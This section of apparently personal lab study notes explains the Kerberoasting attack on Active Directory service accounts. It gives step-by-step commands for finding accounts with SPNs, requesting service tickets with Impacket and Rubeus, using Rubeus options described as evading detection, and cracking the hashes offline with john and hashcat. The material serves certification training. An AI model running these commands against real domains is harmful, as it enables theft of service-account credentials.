# 7.4 - Kerberoasting ## Kerberoasting Kerberoasting targets **service accounts with an assigned SPN**. When a user requests access to a service, they receive a **Service Ticket (ST)** encrypted with the service accountโ€™s long-term password. If an attacker can obtain the **ST**, they can attempt to crack the encryption offline to retrieve the service account password. #### Kerberos Ticket Exchange for Services ``` 3) TGS-REQ (Client -> KDC/TGS) - TGT ๐Ÿ”‘ Encrypted with KDC key - Authenticator Data ๐Ÿ”‘ Encrypted with TGS Session Key 4) TGS-REP (KDC/TGS -> Client) - ST ๐Ÿ”‘ Encrypted with Service key - Service Session Key ๐Ÿ”‘ Encrypted with TGS Session Key ``` Unlike AS-REP Roasting, Kerberoasting requires valid domain user credentials to request a service ticket. ### Example: Exploiting Kerberoasting **Step 1: Create a User with an SPN** ```powershell New-ADUser -Name "kerberoasting" -SamAccountName "kerberoasting" -UserPrincipalName "kerberoasting@dev-angelist" -AccountPassword (ConvertTo-SecureString -AsPlainText "Password123!" -Force) -Enabled $true ``` **Step 2: Assign an SPN** ```powershell Set-ADUser -Identity "kerberoasting" -ServicePrincipalNames @{Add="HTTP/kerberoasting.dev-angelist.lab"} ``` **Step 3: Verify the SPN** ```powershell Get-ADUser -Identity "kerberoasting" -Properties ServicePrincipalNames setspn -L kerberoasting ```
**Step 4: Identify Kerberoastable Accounts** ```bash #On attacker machine create a dedicated python environment (optional) python3 -m venv venv . venv/bin/activate pip3 install impacket #Check kerberoastable users using the Impacket's module: GetUserSPNs.py GetUserSPNs.py dev-angelist.lab/devan:'Password123!' -dc-ip corp-dc #Or using AD Module and PowerView (Windows) Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName Get-DomainUser -SPN ```
in this case there're two vulnerable users: 'kerberoasting' and 'angel'. **Step 5: Request Service Tickets for Kerberoasting** ```powershell GetUserSPNs.py dev-angelist.lab/devan:'Password123!' -dc-ip corp-dc -request #without specifing a user it checks all possible tickets GetUserSPNs.py dev-angelist.lab/devan:'Password123!' -dc-ip corp-dc -request-user kerberoasting | grep '\$krb5tgs\$' > kerberoast.txt ``` or using Rubeus: 
#View statistics on Kerberoastable accounts:
Rubeus.exe kerberoast /stats
#Request a TGS for a specific user:
Rubeus.exe kerberoast /user:svcadmin /simple
#To avoid detection (e.g., MDI logging downgrade attacks), target accounts restricted to RC4:
Rubeus.exe kerberoast /stats /rc4opsec
Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec
#Kerberoast all RC4-only accounts and output to file:
Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt
**Step 6: Crack the Service Ticket** ```bash john --wordlist=/home/kali/Documents/password.txt ./kerberoast.txt hashcat -m 18200 ./kerberoast.txt /home/kali/Documents/password.txt #john.exe --wordlist=C:\AD\Tools\kerberoast\10kworst-pass.txt C:\AD\Tools\hashes.txt ```
#### Troubleshooting: Clock Skew Errors If you encounter `KRB_AP_ERR_SKEW (Clock skew too great)`, synchronize the clocks with: ```bash sudo timedatectl set-ntp off ntpdate -q corp-dc ntpdate -u corp-dc ``` *** ## Other Resources * [Kerberos Authentication Hexdump YT](https://www.youtube.com/watch?v=dQz3CMlVYNY\&list=PLJnLaWkc9xRi71Pso26JlvyBkLUOETLjn) * [Roasting attacks Hexdump YT](https://www.youtube.com/watch?v=fVTZEIZIEqg) ### Labs * [Learning Object 15 lab](https://dev-angelist.gitbook.io/crtp-notes/readme/lab/15-lo1-5)